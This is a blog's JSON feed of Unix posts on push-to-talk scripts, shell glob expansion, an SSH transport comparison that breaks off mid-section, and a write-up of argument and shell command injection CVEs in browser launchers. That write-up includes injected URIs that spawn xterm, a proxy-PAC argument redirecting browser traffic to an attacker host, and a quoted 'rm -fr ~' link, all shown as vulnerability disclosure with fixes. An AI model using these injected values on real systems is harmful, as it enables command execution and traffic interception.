{"version": "https://jsonfeed.org/version/1", "title": "/dev/posts/ - Tag index - unix", "home_page_url": "https://www.gabriel.urdhr.fr", "feed_url": "/tags/unix/feed.json", "items": [{"id": "http://www.gabriel.urdhr.fr/2020/04/11/push-to-talk-in-any-application/", "title": "Push-to-talk in any application", "url": "https://www.gabriel.urdhr.fr/2020/04/11/push-to-talk-in-any-application/", "date_published": "2020-04-11T00:00:00+02:00", "date_modified": "2020-04-11T00:00:00+02:00", "tags": ["computer", "unix", "gui", "pulseaudio", "x11", "covid-19"], "content_html": "

Some scripts I wrote to enable system-wide push-to-talk\n(for X11 and PulseAudio).\nSome people might find them useful during the ongoing lockdown.

\n

Some VoIP software has builtin support for push-to-talk.\nIn this mode, a global keyboard hotkey must be held while speaking.\nThis is quite useful in a noisy environment\nand/or with suboptimal mics.

\n

Some programs with support for this:

\n\n

Most programs don't support this.\nThis is especially true for browser-based VoIP software because there is currently\nno web API (AFAIU) to register a global keyboard hotkey1.

\n

So I wrote two Python scripts for PulseAudio.

\n

Push-to-talk

\n

The first one\nimplements push-to-talk based on some keyboard key\n(i.e. you have to hold the key while you are talking):

\n
pushtotalk --key \"Home\"\n
\n\n\n

It's intended for PulseAudio\nand X11 but it should be quite easy to adapt this to other sound and GUI systems.

\n

Toggle audio source

\n

The second one\njust toggles the mute state of the default PulseAudio source\nand provides a visual feedback (notification).\nIt's intended to be bound to some global keyboard hotkey.

\n

For example using a script\nbased on keybinder:

\n
keybinder \"<Control>m\" pulse-mute-toggle\n
\n\n\n

Simply toggling the audio source can be done with:

\n
pactl set-source-mute @DEFAULT_SOURCE@ toggle\n
\n\n\n

Getting the notification of the state is important because otherwise you might\nend up being in the wrong state.\nThere is no pactl get-source-mute @DEFAULT_SOURCE@ command,\nwhich is why it's not an absolutely straightforward shell script2.
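
\n

For illustration, here is a minimal sketch of what the toggle script does, assuming pactl and notify-send are available (the current state is recovered by parsing pactl output, since there is no direct query):

\n
#!/bin/sh\n# Hypothetical sketch: toggle the default source and report the new state.\npactl set-source-mute @DEFAULT_SOURCE@ toggle\ndefault_source=$(pactl info | sed -n 's/^Default Source: //p')\nstate=$(pactl list sources | awk -v src=\"$default_source\" '$1 == \"Name:\" { cur = $2 } $1 == \"Mute:\" && cur == src { print $2 }')\nnotify-send \"Microphone\" \"Muted: $state\"\n
\n\n\n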

\n
\n
\n
    \n
  1. \n

    This is why this feature is apparently available on the native Discord application\nbut not on the web one.\u00a0\u21a9

    \n
  2. \n

    It can be done by:

    \n
      \n
    • parsing the output of pacmd list-sources or similar (which is cumbersome);
    • relying on the native protocol;
    • using the PulseAudio D-Bus interface.
    \n

    I decided to use the D-Bus interface\n(which is sadly not enabled by default).\u00a0\u21a9

    \n
\n
"}, {"id": "http://www.gabriel.urdhr.fr/2019/03/29/surprising-shell-pathname-expansion/", "title": "Surprising shell pathname expansion", "url": "https://www.gabriel.urdhr.fr/2019/03/29/surprising-shell-pathname-expansion/", "date_published": "2019-03-29T00:00:00+01:00", "date_modified": "2019-03-29T00:00:00+01:00", "tags": ["computer", "unix", "shell"], "content_html": "

I thought I understood pretty well how bash argument processing and\nthe various expansions are supposed to behave. Apparently, there are still\nsubtleties which trick me sometimes.

\n

Question: what is the (standard) output of the following shell command? \"\ud83e\udd14\"

\n
a='*' ; echo $a\n
\n\n\n

The answer is below this anti-spoiler protection.

\n


\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n

\n

Answer

\n

Here's the command again:

\n
a='*' ; echo $a\n
\n\n\n

I would have said that the answer was *, obviously.\nBut this is wrong.\nThe output is the list of files in the current directory.\n\"\ud83d\ude32\"

\n

The content of the a variable is * because the assignment is single-quoted.\nFor example, this shell command does output *:

\n
a='*' ; echo \"$a\"\n
\n\n\n

However, in echo $a, * is pathname-expanded into the list of files\nin the current directory.\nI would not have thought that pathname expansion would trigger in this case.

\n

Explanation

\n

This is indeed the behaviour specified for POSIX shell\nWord Expansions:

\n
\n

The order of word expansion shall be as follows:

\n
    \n
  1. \n

    Tilde expansion (see Tilde Expansion), parameter expansion\n (see Parameter Expansion), command substitution (see Command Substitution),\n and arithmetic expansion (see Arithmetic Expansion) shall be performed,\n beginning to end. See item 5 in Token Recognition.

    \n
  2. \n

    Field splitting (see Field Splitting) shall be performed on the portions\n of the fields generated by step 1, unless IFS is null.

    \n
  3. \n

    Pathname expansion (see Pathname Expansion) shall be performed,\n unless set -f is in effect.

    \n
  4. \n

    Quote removal (see Quote Removal) shall always be performed last.

    \n
\n
\n

Pathname expansion happens after variable expansion.\nI would have said it was done before variable expansion\nand command substitution.

\n

Edit: I think what I actually found surprising is that\npattern matching characters\ncoming from expansions are actually active\npattern matching characters (instead of counting as ordinary characters).
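
\n

A quick illustration of that point (run it in an otherwise empty directory for predictable output):

\n
a='*'\necho $a       # pathname expansion: lists the files in the current directory\necho \"$a\"     # quoted expansion: prints *\nset -f        # disable pathname expansion\necho $a       # prints * again\n
\n\n\n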

\n

About Parameter Expansion,\nPOSIX mandates that double-quotes prevent pathname expansion from happening\n(i.e. if there is no quoting, pathname expansion happens):

\n
\n

If a parameter expansion occurs inside double-quotes:\nPathname expansion shall not be performed on the results of the expansion.

\n
\n

Of course,\nsingle quotes prevent pathname expansion\nfrom happening\n(in addition to preventing variable expansion and other things from happening):

\n
\n

Enclosing characters in single-quotes ('') shall preserve the literal value\nof each character within the single-quotes. A single-quote cannot occur within\nsingle-quotes.

\n
\n

This is not super surprising if we think about, for example:

\n
# List all HTML files:\next=html ; echo *.$ext\n
\n\n\n

This works as well with pattern matching:

\n
ext=html\nfor a in \"$@\"; do\n  case \"$a\" in\n    *.$ext)\n        echo \"Interesting file: $a\"\n        ;;\n    *)\n      echo \"Boring file: $a\"\n      ;;\n  esac\ndone\n
\n\n\n

Command Substitution

\n

About\nCommand Substitution\nPOSIX mandates:

\n
\n

If a command substitution occurs inside double-quotes, field splitting\nand pathname expansion shall not be performed on the results of the substitution.

\n
\n

Which means that this command\noutputs the list of files in the current directory as well:

\n
echo $(echo '*')\n
\n\n\n

Context

\n

It took me some time to understand what\nwas happening when debugging a slightly more convoluted example\nfrom YunoHost:

\n
ynh_mysql_execute_as_root \"GRANT ALL PRIVILEGES ON *.* TO '$db_admin_user'@'localhost' IDENTIFIED BY '$db_admin_pwd' WITH GRANT OPTION;\n  FLUSH PRIVILEGES;\" mysql\n
\n\n\n

Inside ynh_mysql_execute_as_root, the parameters are assigned to local\nvariables with this (bash) code:

\n
arguments[$i]=\"${arguments[$i]//\\\"/\\\\\\\"}\"\narguments[$i]=\"${arguments[$i]//$/\\\\\\$}\"\neval ${option_var}+=\\\"${arguments[$i]}\\\"\n
\n\n\n

This code is obviously vulnerable to shell command code injection\nin the eval line\nthrough backticks and backslashes.\nWhat surprised me\nis that pathname expansion was happening in *.*.\nThis is because ${arguments[$i]} is not double-quoted in the last line\nand this is completely unrelated to eval.

\n

For reference, the correct and simple way to proceed,\nwhich avoids unwanted command injection and pathname expansion is:

\n
eval ${option_var}+='\"${arguments[$i]}\"'\n
\n\n\n

Conclusion

\n

Unquoted variable expansion and command substitutions\nare trickier than I thought.

\n

When variable expansion or command substitution happens unquoted,\npathname expansion might happen. I think this might have security\nimplications for some shell scripts out there.
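
\n

For example (a purely hypothetical sketch), a script that leaves an untrusted value unquoted lets an attacker turn it into a glob matching unrelated files:

\n
pattern='/var/backups/[a-z]*'   # untrusted input\nrm -- $pattern                  # unquoted: the glob is expanded, other files may be removed\nrm -- \"$pattern\"                # quoted: only the literal name is used\n
\n\n\n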

"}, {"id": "http://www.gabriel.urdhr.fr/2018/05/30/more-browser-injections/", "title": "More example of argument and shell command injections in browser invocation", "url": "https://www.gabriel.urdhr.fr/2018/05/30/more-browser-injections/", "date_published": "2018-05-30T00:00:00+02:00", "date_modified": "2018-05-30T00:00:00+02:00", "tags": ["computer", "unix", "debian", "security", "shell"], "content_html": "

In the previous episode, I talked about\nsome argument and shell command injection vulnerabilities\nthrough URIs passed to browsers.\nHere I'm checking some other CVEs which were registered at the same time.

\n

ScummVM (CVE-2017-17528)

\n

In ScummVM, we have:

\n
bool OSystem_POSIX::openUrl(const Common::String &url) {\n    // inspired by Qt's \"qdesktopservices_x11.cpp\"\n\n    // try \"standards\"\n    if (launchBrowser(\"xdg-open\", url))\n        return true;\n    if (launchBrowser(getenv(\"DEFAULT_BROWSER\"), url))\n        return true;\n    if (launchBrowser(getenv(\"BROWSER\"), url))\n        return true;\n\n    // try desktop environment specific tools\n    if (launchBrowser(\"gnome-open\", url)) // gnome\n        return true;\n    if (launchBrowser(\"kfmclient openURL\", url)) // kde\n        return true;\n    if (launchBrowser(\"exo-open\", url)) // xfce\n        return true;\n\n    // try browser names\n    if (launchBrowser(\"firefox\", url))\n        return true;\n    if (launchBrowser(\"mozilla\", url))\n        return true;\n    if (launchBrowser(\"netscape\", url))\n        return true;\n    if (launchBrowser(\"opera\", url))\n        return true;\n    if (launchBrowser(\"chromium-browser\", url))\n        return true;\n    if (launchBrowser(\"google-chrome\", url))\n        return true;\n\n    warning(\"openUrl() (POSIX) failed to open URL\");\n    return false;\n}\n\nbool OSystem_POSIX::launchBrowser(const Common::String& client, const Common::String &url) {\n    // FIXME: system's input must be heavily escaped\n    // well, when url's specified by user\n    // it's OK now (urls are hardcoded somewhere in GUI)\n    Common::String cmd = client + \" \" + url;\n    return (system(cmd.c_str()) != -1);\n}\n
\n\n\n

OSystem_POSIX::openUrl() calls system() without quoting the URI.\nThis is clearly vulnerable to shell command injection but,\nas stated in the comment, it's currently not a problem in practice\nbecause the only calls to openUrl() are:

\n
g_system->openUrl(\"http://www.amazon.de/EuroVideo-Bildprogramm-GmbH-Full-Pipe/dp/B003TO51YE/ref=sr_1_1?ie=UTF8&s=videogames&qid=1279207213&sr=8-1\");\ng_system->openUrl(\"http://pipestudio.ru/fullpipe/\");\ng_system->openUrl(\"http://scummvm.org/\")\ng_system->openUrl(getUrl())\n
\n\n\n

with:

\n
Common::String StorageWizardDialog::getUrl() const {\n    Common::String url = \"https://www.scummvm.org/c/\";\n    switch (_storageId) {\n    case Cloud::kStorageDropboxId:\n        url += \"db\";\n        break;\n    case Cloud::kStorageOneDriveId:\n        url += \"od\";\n        break;\n    case Cloud::kStorageGoogleDriveId:\n        url += \"gd\";\n        break;\n    case Cloud::kStorageBoxId:\n        url += \"bx\";\n        break;\n    }\n\n    if (Cloud::CloudManager::couldUseLocalServer())\n        url += \"s\";\n\n    return url;\n}\n
\n\n\n

The only case where shell commands are actually injected is the first one where\nit does something like:

\n
xdg-open https://www.amazon.de/EuroVideo-Bildprogramm-GmbH-Full-Pipe/dp/B003TO51YE/ref=sr_1_1?ie=UTF8&s=videogames&qid=1279207213&sr=8-1\n
\n\n\n

which makes these assignments in subshells (which is quite harmless):

\n
ie=UTF8\ns=videogames\nqid=1279207213\nsr=8-1\n
\n\n\n

References:

\n\n

GNU GLOBAL (CVE-2017-17531)

\n

In GNU GLOBAL, it looked like this:

\n
snprintf(com, sizeof(com), \"%s \\\"%s\\\"\", browser, url);\nsystem(com);\n
\n\n\n

Here, the URI is double-quoted, but this is not enough: expansions such as command\nsubstitution still happen inside double quotes.
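
\n

A hypothetical illustration: the $(...) inside the URI is substituted by the shell even though it sits between double quotes, so this ends up spawning an xterm:

\n
# Roughly what system() ends up executing for a crafted URI (firefox standing in for the configured browser):\nsh -c 'firefox \"http://www.example.com/$(xterm)\"'\n
\n\n\n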

\n\n

For v6.6.1,\neach argument is quoted with quote_shell() in order to properly escape\nthe shell metacharacters:

\n
strbuf_puts(sb, quote_shell(browser));\nstrbuf_putc(sb, ' ');\nstrbuf_puts(sb, quote_shell(url));\nsystem(strbuf_value(sb));\n
\n\n\n

In v6.6.2\nthis was changed to using execvp():

\n
argv[0] = (char *)browser;\nargv[1] = (char *)url;\nargv[2] = NULL;\nexecvp(browser, argv);\n
\n\n\n

Using execvp() is much better than relying on system() and using\nan error-prone escaping of the URI to prevent injections.

\n

References:

\n\n

gjots2 (CVE-2017-17535)

\n

In gjots2, the vulnerable code is:

\n
def _run_browser_on(self, url):\n  if self.debug:\n    print inspect.getframeinfo(inspect.currentframe())[2]\n  browser = self._get_browser()\n  if browser:\n    os.system(browser + \" '\" + url + \"' &\")\n  else:\n    self.msg(\"Can't run a browser\")\n  return 0\n
\n\n\n

The URI is single-quoted.

\n

We can use single-quotes in the URI to inject commands.\nFor example, opening this link in gjots2 spawns an xterm:

\n
\nhttp://www.example.com/'&xterm'\n
\n\n

References:

\n\n

AbiWord (CVE-2017-17529)

\n

In AbiWord, we have:

\n
GError *err = NULL;\n#if GTK_CHECK_VERSION(2,14,0)\nif(!gtk_show_uri (NULL, url, GDK_CURRENT_TIME, &err)) {\n  fallback_open_uri(url, &err);\n}\nreturn err;\n#elif defined(WITH_GNOMEVFS)\ngnome_vfs_url_show (url);\nreturn err;\n#else\nfallback_open_uri(url, &err);\nreturn err;\n#endif\n
\n\n\n

The problematic code is supposed to be in fallback_open_uri():

\n
gint    argc;\ngchar **argv = NULL;\nchar   *cmd_line = g_strconcat (browser, \" %1\", NULL);\n\nif (g_shell_parse_argv (cmd_line, &argc, &argv, err)) {\n  /* check for '%1' in an argument and substitute the url\n   * otherwise append it */\n  gint i;\n  char *tmp;\n\n  for (i = 1 ; i < argc ; i++)\n    if (NULL != (tmp = strstr (argv[i], \"%1\"))) {\n      *tmp = '\\0';\n      tmp = g_strconcat (argv[i],\n        (clean_url != NULL) ? (char const *)clean_url : url,\n        tmp+2, NULL);\n      g_free (argv[i]);\n      argv[i] = tmp;\n      break;\n    }\n\n  /* there was actually a %1, drop the one we added */\n  if (i != argc-1) {\n    g_free (argv[argc-1]);\n    argv[argc-1] = NULL;\n  }\n  g_spawn_async (NULL, argv, NULL, G_SPAWN_SEARCH_PATH,\n    NULL, NULL, NULL, err);\n  g_strfreev (argv);\n}\ng_free (cmd_line);\n
\n\n\n

This code seems correct with respect to injection through the URI:\nthe URI string cannot be expanded into multiple arguments\n(no word splitting) and is not passed to system().

\n

I think this code is safe.\nI tested gtk_show_uri(), fallback_open_uri() and gnome_vfs_url_show()\nin isolation and could not trigger any injection through the URI,\nnor through AbiWord itself.

\n

References:

\n\n

FontForge (CVE-2017-17521)

\n

In FontForge, the help() function is clearly vulnerable: the URI is\nmerely double-quoted, which does not prevent injection:

\n
temp = malloc(strlen(browser) + strlen(fullspec) + 20);\nsprintf( temp, strcmp(browser,\"kfmclient openURL\")==0 ? \"%s \\\"%s\\\" &\" : \"\\\"%s\\\" \\\"%s\\\" &\", browser, fullspec );\nsystem(temp);\n
\n\n\n

In practice, it is always used with paths for which this is safe.

\n

References:

\n\n

Ocaml Batteries Included (CVE-2017-17519)

\n

The code is:

\n
let (browser: (_, _, _) format) = \"@BROWSER_COMMAND@ %s\";;\n\n(**The default function to open a www browser.*)\nlet default_browse s =\n  let command = Printf.sprintf browser s in\n  Sys.command command\nlet current_browse = ref default_browse\n\nlet browse s = !current_browse s\n
\n\n\n

system() is called without any quoting of the URI.

\n

Example:

\n
open Batteries;;\nopen BatteriesConfig;;\nbrowse \"http://www.example.com/&xterm\";;\n
\n\n\n

Compiled with:

\n
ocamlfind ocamlc -package batteries -linkpkg browser2.ml -o browser2\n
\n\n\n

References:

\n\n

Python 3 (CVE-2017-17522)

\n

The code is:

\n
class GenericBrowser(BaseBrowser):\n    \"\"\"Class for all browsers started with a command\n       and without remote functionality.\"\"\"\n\n    def __init__(self, name):\n        if isinstance(name, str):\n            self.name = name\n            self.args = [\"%s\"]\n        else:\n            # name should be a list with arguments\n            self.name = name[0]\n            self.args = name[1:]\n        self.basename = os.path.basename(self.name)\n\n    def open(self, url, new=0, autoraise=True):\n        cmdline = [self.name] + [arg.replace(\"%s\", url)\n                                 for arg in self.args]\n        try:\n            if sys.platform[:3] == 'win':\n                p = subprocess.Popen(cmdline)\n            else:\n                p = subprocess.Popen(cmdline, close_fds=True)\n            return not p.wait()\n        except OSError:\n            return False\n
\n\n\n

A note in the CVE says:

\n
\n

NOTE: a software maintainer indicates that exploitation is impossible\nbecause the code relies on subprocess.Popen and the default shell=False\nsetting.

\n
\n

Popen is indeed passed an array of arguments which are passed to execve().\nThere is no argument splitting and no shell is involved,\nso this code is not vulnerable to URI-based injections.

\n

References:

\n\n

TeX (CVE-2017-17513)

\n

I have no idea what mtxrun is supposed to do but it looks\nlike it's vulnerable because the URI is not quoted:

\n
local launchers={\n  windows=\"start %s\",\n  macosx=\"open %s\",\n  unix=\"$BROWSER %s &> /dev/null &\",\n}\nfunction os.launch(str)\n  execute(format(launchers[os.name] or launchers.unix,str))\nend\n
\n\n\n

References:

\n\n

Summary

\n"}, {"id": "http://www.gabriel.urdhr.fr/2018/05/28/browser-injections/", "title": "Argument and shell command injections in browser invocation", "url": "https://www.gabriel.urdhr.fr/2018/05/28/browser-injections/", "date_published": "2018-05-28T00:00:00+02:00", "date_modified": "2018-05-28T00:00:00+02:00", "tags": ["computer", "unix", "debian", "security", "shell"], "content_html": "

While reading the source of sensible-browser in order to understand how\nit was choosing which browser to call (and how I could tweak this choice),\nI found an argument injection vulnerability\nwhen handling the BROWSER environment variable.\nThis led me (and others) to a few other argument and shell command injection\nvulnerabilities in BROWSER processing and browser invocation in general.

\n

Overview:

\n\n

Table of Contents

\n
\n\n
\n

The BROWSER environment variable

\n

The BROWSER environment variable is used as a way to specify the user's\npreferred browser. The specific handling of this variable is not consistent\nacross programs:

\n\n

As was already noted in 2001,\nnaively implementing support for this environment variable\n(and especially the %s expansion) can lead to injection vulnerabilities:

\n
\n

Eric Raymond has proposed the BROWSER convention for Unix-like systems,\nwhich lets users specify their browser preferences and lets developers easily\ninvoke those browsers. In general, this is a great idea.\nUnfortunately, as specified it has horrendous security flaws;\ndocuments containing hypertext links like ; /bin/rm -fr ~\nwill erase all of a user's files when the user selects it!

\n
\n

In contrast, the .desktop file specification\nclearly specifies\nhow argument expansion and word splitting are supposed to happen\nwhen processing .desktop files,\nin a way which is not vulnerable to injection attacks.

\n

Argument injection in sensible-browser (CVE-2017-17512)

\n

The vulnerability

\n

sensible-browser is a simple program which tries to guess a suitable browser\nto open a given URI. You call it like:

\n
sensible-browser http://www.example.com/\n
\n\n\n

and it ultimately calls something like:

\n
firefox http://www.example.com/\n
\n\n\n

The actual browser called depends on the desktop environment (and its\nconfiguration) and some environment variable.

\n

While trying to understand how I could configure the browser to use,\nI found this snippet:

\n
if test -n \"$BROWSER\"; then\n  OLDIFS=\"$IFS\"\n  IFS=:\n  for i in $BROWSER; do\n      case \"$i\" in\n          (*%s*)\n          :\n          ;;\n          (*)\n          i=\"$i %s\"\n          ;;\n      esac\n      IFS=\"$OLDIFS\"\n      cmd=$(printf \"$i\\n\" \"$URL\")\n      $cmd && exit 0\n  done\nfi\n
\n\n\n

The idea is that when the BROWSER environment variable is set, it is taken\nas a list of browsers which are tried in turn. Moreover, if %s is present in\none of the browser strings, it is replaced with the URI.

\n

The problem is that if $URL contains some spaces (or other IFS characters)\nthe URL will be split into several arguments.

\n

The interesting lines are:

\n
cmd=$(printf \"$i\\n\" \"$URL\")\n$cmd && exit 0\n
\n\n\n

An attacker could inject additional arguments in the browser call.

\n

For example, this command opens a Chromium window in incognito mode:

\n
BROWSER=chromium sensible-browser \"http://www.example.com/ --incognito\"\n
\n\n\n

One could argue that this URI is invalid and that this is not a problem.\nHowever, if the caller of sensible-browser does not properly validate the URI,\nan attacker could craft a broken URI which adds extra arguments\nto the browser invocation.

\n

A suitable caller

\n

Emacs might call sensible-browser with an invalid URI.

\n

First, we configure it to open links with sensible-browser:

\n
(setq browse-url-browser-function (quote browse-url-generic))\n(setq browse-url-generic-program \"sensible-browser\")\n
\n\n\n

Now, an org-mode file like this one will open Chromium in incognito mode:

\n
[[http://www.example.com/ --incognito][test]]\n
\n\n\n

Note: I was able to trigger this with org-mode 9.1.2 as shipped in the\nDebian elpa-org package. This does not happen with org-mode 8.2.10\nwhich was shipped in the emacs25 package.

\n

MITMing the browser

\n

This particular example is not very dangerous and the injection is easy\nto notice. However, other injected arguments can be more harmful and more\ninsidious.

\n

Clicking on the link of this org file launches Chromium with an\nalternative PAC file:

\n
[[http://www.example.com/ --proxy-pac-file=http://dangerous.example.com/proxy.pac][test]]\n
\n\n\n

Nothing is notifying the user that an alternative PAC file is in use.

\n

An attacker could use this type of URI to forward all the browser traffic\nto a server under their control and effectively MITM it:

\n
function FindProxyForURL(url, host)\n{\n  return \"SOCKS mitm.example.com:9080\";\n}\n
\n\n\n

Of course, for HTTPS websites, the attacker still cannot MITM the user unless\nthe user accepts a bogus certificate.

\n

Alternatively, you can simply\npass a --proxy-server argument\nto set a proxy without using a PAC file.

\n

Fixing the vulnerability

\n

A possible fix would be for sensible-browser to actually check that the\nURL parameter does not contain any IFS character.
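
\n

A minimal sketch of such a check (my own suggestion, not the deployed fix; it assumes the default IFS of space, tab and newline):

\n
if printf '%s' \"$URL\" | grep -q '[[:space:]]'; then\n    echo \"sensible-browser: refusing URI containing whitespace\" >&2\n    exit 1\nfi\n
\n\n\n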

\n

The fix currently deployed is to remove support for %s-expansion altogether\n(as well as support for multiple browsers):

\n
if test -n \"$BROWSER\"; then\n    ${BROWSER} \"$@\"\n    ret=\"$?\"\n    if [ \"$ret\" -ne 126 ] && [ \"$ret\" -ne 127 ]; then\n        exit \"$ret\"\n    fi\nfi\n
\n\n\n

References

\n\n

Argument injection in xdg-open (CVE-2017-18266)

\n

xdg-open is similar to sensible-browser. It opens files or URIs with some\nprogram depending on the desktop environment.\nIn some cases it falls back to using BROWSER:

\n
open_envvar()\n{\n    local oldifs=\"$IFS\"\n    local browser browser_with_arg\n\n    IFS=\":\"\n    for browser in $BROWSER; do\n        IFS=\"$oldifs\"\n\n        if [ -z \"$browser\" ]; then\n            continue\n        fi\n\n        if echo \"$browser\" | grep -q %s; then\n            $(printf \"$browser\" \"$1\")\n        else\n            $browser \"$1\"\n        fi\n\n        if [ $? -eq 0 ]; then\n            exit_success\n        fi\n    done\n}\n
\n\n\n

The interesting bit is:

\n
$(printf \"$browser\" \"$1\")\n
\n\n\n

This is vulnerable to argument injection like the sensible-browser case.

\n

This bug was reported in the xdg-utils bugtracker as bug\n#103807\nand I proposed this very simple fix:

\n
if echo \"$browser\" | grep -q %s; then\n  # Avoid argument injection.\n  # See https://bugs.freedesktop.org/show_bug.cgi?id=103807\n  # URIs don't have IFS characters (such as spaces) anyway.\n  has_single_argument $1 && $(printf \"$browser\" \"$1\")\nelse\n  $browser \"$1\"\nfi\n
\n\n\n

where has_single_argument() is defined as:

\n
has_single_argument()\n{\n  test $# = 1\n}\n
\n\n\n

Another (better) solution\ncurrently shipped in Debian is:

\n
url=\"$1\"\nif echo \"$browser\" | grep -q %s; then\n  shift $#\n  for arg in $browser; do\n    set -- \"$@\" \"$(printf -- \"$arg\" \"$url\")\"\n  done\n  \"$@\"\nelse\n  $browser \"$url\"\nfi\n
\n\n\n

By the way, I learned about this usage of set.
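
\n

For reference, the trick is that set -- rebuilds the positional parameters one word at a time, so the URL itself is never subject to word splitting:

\n
set --                      # clear \"$@\"\nfor arg in foo bar baz; do\n    set -- \"$@\" \"$arg\"      # append one argument, verbatim\ndone\nprintf '<%s>\\n' \"$@\"        # prints <foo>, <bar>, <baz>: one argument each\n
\n\n\n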

\n

References:

\n\n

Shell command injection in lilypond (CVE-2017-17523, CVE-2018-10992)

\n

I started checking if the same vulnerability could be found in other programs\nusing Debian code search.\nThis led me to lilypond-invoke-editor.

\n

This is a helper script expected to be set as a URI handler in a PDF viewer.\nIt handles some special lilypond URIs\n(textedit://FILE:LINE:CHAR:COLUMN).\nIt forwards other URIs to some real browser using:

\n
(define (run-browser uri)\n  (system\n   (if (getenv \"BROWSER\")\n       (format #f \"~a ~a\" (getenv \"BROWSER\") uri)\n       (format #f \"firefox -remote 'OpenURL(~a,new-tab)'\" uri))))\n
\n\n\n

The Scheme system function is equivalent to the C system():\nit passes the argument to the shell (with sh -c).

\n

This case is worse than the previous ones.\nNot only can an attacker inject extra arguments\n(provided the caller can pass IFS characters)\nbut it's also possible to inject arbitrary shell commands:

\n
BROWSER=\"chromium\" lilypond-invoke-editor \"http://www.example.com/ & xterm\"\n
\n\n\n

It even works with valid URIs:

\n
BROWSER=\"chromium\" lilypond-invoke-editor \"http://www.example.com/&xterm\"\n
\n\n\n

We can generate a simple PDF file which contains a link\nwhich calls xterm through lilypond-invoke-editor:

\n
BROWSER=\"lilypond-invoke-editor\" mupdf xterm-inject.pdf\n
\n\n\n

The current fix in Debian is:

\n
(define (run-browser uri)\n  (if (getenv \"BROWSER\")\n        (system*\n          (getenv \"BROWSER\")\n          uri)\n          (system*\n            \"firefox\"\n            \"-remote\"\n            (format #f \"OpenUrl(~a,new-tab)\" uri))))\n
\n\n\n

system* is similar to posix_spawnp(): it takes a list of arguments\nand does something like fork(), execvp() and wait()\n(without going through a shell interpreter).

\n

References:

\n\n

Similar vulnerabilities

\n

Someone apparently took over the job of finding similar issues in other packages\nbecause a whole range of related CVEs was registered at the same time\n(some of them are disputed, not all of them are valid):

\n\n

I'll look at some of them in a later episode.

\n

Analysis

\n

These vulnerabilities can be split into two classes.

\n

Argument injection

\n

Argument injection can happen when IFS characters present in the URI are expanded\ninto multiple arguments.\nThis usually happens because of unquoted shell expansion\nof non-validated strings:

\n
my-command $some_untrusted_input\n
\n\n\n

IFS characters are not allowed in valid URIs, so if the URI\nwas already validated somehow by the caller, this is not an issue.\nAs we have seen, some callers might not properly validate the URI string.

\n

Shell command injection

\n

Shell command injection can happen when shell metacharacters\n($, <, >, ;, &, &&, |, ||, etc.) found in the URI\nare passed without proper escaping to the shell interpreter:

\n\n

A typical example would be (in Python):

\n
os.system(\"my-command \" + url)\n
\n\n\n

Or in shell:

\n
eval my-command \"$url\"\n
\n\n\n

In some cases, some escaping is done such as\nin gjots2:

\n
os.system(browser + \" '\" + url + \"' &\")\n
\n\n\n

This simple quoting is not enough, however, because you can escape out of it\nusing single-quotes in the untrusted input. If you want to do that, you need\nto properly escape\nquotes and backslashes in the input as well:

\n
os.system(\"{} {} \".format(browser, shlex.quote(url)))\n
\n\n\n

Using system() is often a bad idea and you'd better use:

\n\n

For example, the previous snippet could be rewritten as:

\n
os.spawnvp(os.P_WAIT, browser, [browser, url])\n
\n\n\n

Some of the shell metacharacters (&, ;, etc.) can be present in valid URIs\n(e.g. http://www.example.com/&xterm),\nso even proper URI validation does not protect against those attacks.

\n

Related

\n"}, {"id": "http://www.gabriel.urdhr.fr/2017/08/02/foo-over-ssh/", "title": "Foo over SSH", "url": "https://www.gabriel.urdhr.fr/2017/08/02/foo-over-ssh/", "date_published": "2017-08-02T00:00:00+02:00", "date_modified": "2017-08-02T00:00:00+02:00", "tags": ["computer", "network", "ssh", "unix"], "content_html": "

A comparison of the different solutions for using SSH-2 as a secure\ntransport for protocols/services/applications.

\n

Table of Contents

\n
\n\n
\n

SSH-2 Protocol

\n

Overview

\n

The SSH-2 protocol uses its\nTransport Layer Protocol to provide\nencryption, confidentiality, server authentication and integrity over a\n(potentially) unsafe reliable bidirectional data stream (usually TCP port 22):

\n

The transport layer transports SSH packets.\nIt handles:

\n\n

Each packet starts with a message number and can belong to:

\n\n

Typical protocol stack (assuming TCP/IP):

\n
\n            [Session | Forwarding]\n[SSH Authn. |SSH Connection      ]\n[SSH Transport                   ]\n[TCP                             ]\n[IP                              ]\n
\n\n

Connection Protocol

\n

The Connection Protocol is used\nto manage channels\nand transfer data over them. Each channel is (roughly) a bidirectional\ndata stream:

\n\n

Multiple channels can be multiplexed over the same SSH connection:

\n
\nC \u2192 S CHANNEL_DATA(1, \"whoami\\n\")\nC \u2192 S CHANNEL_DATA(2, \"GET / HTTP/1.1\\r\\nHost: foo.example.com\\r\\n\\r\\n\")\nC \u2190 S CHANNEL_DATA(5, \"root\\n\")\nC \u2190 S CHANNEL_DATA(6, \"HTTP/1.1 200 OK\\r\\nContent-Type:text/plain\\r\\n\")\nC \u2190 S CHANNEL_DATA(6, \"Content-Length: 11\\r\\n\\r\\nHello World!\")\n
\n\n

Channels

\n

Session Channel

\n

A session channel is used to start:

\n\n

For session channels, the protocol has support for setting environment variables,\nallocating a server-side TTY, enabling X11 forwarding, notifying of terminal\nsize changes (see SIGWINCH), sending signals, and reporting the exit\nstatus or exit signal.

\n
\nC \u2192 S CHANNEL_OPEN(\"session\", 2, \u2026)\nC \u2190 S CHANNEL_OPEN_CONFIRMATION(3, 6)\nC \u2192 S CHANNEL_REQUEST(6, \"pty-req\", TRUE, \"xterm\", 80, 120, \u2026)\nC \u2190 S CHANNEL_SUCCESS(3)\nC \u2192 S CHANNEL_REQUEST(6, \"env\", TRUE, \"LANG\", \"fr_FR.utf8\")\nC \u2190 S CHANNEL_SUCCESS(3)\nC \u2192 S CHANNEL_REQUEST(6, \"exec\", TRUE, \"ls /usr/\")\nC \u2190 S CHANNEL_SUCCESS(3)\nC \u2190 S CHANNEL_DATA(3, \"bin\\ngames\\ninclude\\nlib\\nlocal\\sbin\\nshare\\nsrc\\n\")\nC \u2190 S CHANNEL_EOF(3)\nC \u2190 S CHANNEL_REQUEST(3, \"exit-status\", FALSE, 0)\nC \u2190 S CHANNEL_CLOSE(3)\nC \u2192 S CHANNEL_CLOSE(6)\n
\n\n

Shell

\n

Shell session channels are used for interactive sessions and are not really\nuseful for protocol encapsulation.

\n

Commands

\n

